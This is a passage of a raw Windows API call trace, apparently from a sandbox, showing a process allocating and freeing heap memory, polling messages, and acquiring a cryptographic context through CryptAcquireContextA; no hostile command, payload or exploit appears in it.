[0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0196.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0196.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x90d420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0196.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.672] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0196.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0196.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0196.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15) returned 0x90d420 [0196.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x90d420, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.673] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0196.674] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0196.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0196.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0196.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0196.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.683] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0196.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0196.685] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.685] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0196.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.686] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.687] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0196.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0196.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0196.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0196.688] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0196.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0196.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.689] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.689] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.689] HeapFree (in: hHeap=0x8a0000, 